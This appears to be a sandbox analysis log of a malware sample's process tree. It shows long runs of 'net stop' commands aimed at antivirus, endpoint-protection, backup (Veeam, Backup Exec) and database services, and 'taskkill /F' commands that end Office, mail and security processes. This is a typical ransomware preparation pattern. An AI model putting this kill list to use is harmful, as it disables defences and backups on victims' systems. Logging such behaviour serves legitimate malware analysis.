C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
